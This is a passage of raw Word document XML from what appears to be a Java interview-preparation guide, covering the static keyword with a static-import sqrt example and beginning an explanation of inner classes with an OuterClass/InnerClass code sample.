          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F85B73C" w14:textId="77777777"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5225461"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D347FF" w14:textId="77777777"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5225461"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7DDB40" w14:textId="77777777"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5225461"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sqrt</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Instead of Math.sqrt(25), just sqrt(25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A510960" w14:textId="77777777"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5225461"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC2E487" w14:textId="21354AE5" w:rsidR="0014275E" w:rsidRPr="0014275E" w:rsidRDefault="00142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5225461"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A82D201" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BF4AF3" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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lass-level</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static members are shared by all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB3D45" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static members are allocated memory once when the class is loaded, and they are not duplicated for each instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345A569C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ing Static Members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static members can be accessed directly using the class name, without creating an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B970A6" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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to Use static:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2338D7" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38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static when a variable or method should be shared across all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B487435" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38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Use static for utility methods (like Math.sqrt(), Collections.sort()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F08DF" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38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static to define constants (e.g., public static final double PI = 3.14159;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412410E7" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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y using static, you reduce memory consumption (as the same member is shared across all instances) and allow methods and variables to be accessed without creating an object of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CE0103" w14:textId="2E00AF86"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B05865E">
          <v:rect id="_x0000_i1179" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D14A760" w14:textId="33BE1C79" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00330FC2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc196307532"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is inner class? Have you used inner class in your project</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="0C0C9CC1" w14:textId="6AB9B235" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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at is an Inner Class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE6454B" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inner class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a class that is defined within another class. Inner classes are used when you want to logically group classes that are used in only one place or need to access the outer class's members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD3C64" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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re are several types of inner classes in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6402A29D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ber Inner Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A class defined within another class at the member level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54255C84" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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cal Inner Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A class defined within a method or a block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B1AFB" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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nonymous Inner Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A class without a name, often used to instantiate classes that implement interfaces or extend other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A26DFA9" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Nested Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A class defined within another class but with the static modifier, meaning it does not need an instance of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F0D04" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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Inner Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39833C41" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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s an example of different types of inner classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB4F5E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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Member Inner Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910CD79" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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member inner class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a regular inner class that is declared at the member level inside an outer class. It can access all members (including private members) of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE3AA5"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661417"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w: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23AC9898"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661417"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> outerVariable </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Outer Class Variable"</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F66D217"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661417"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16969227"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661417"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InnerClass</w:t>
      </w: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297194D2"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661417"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
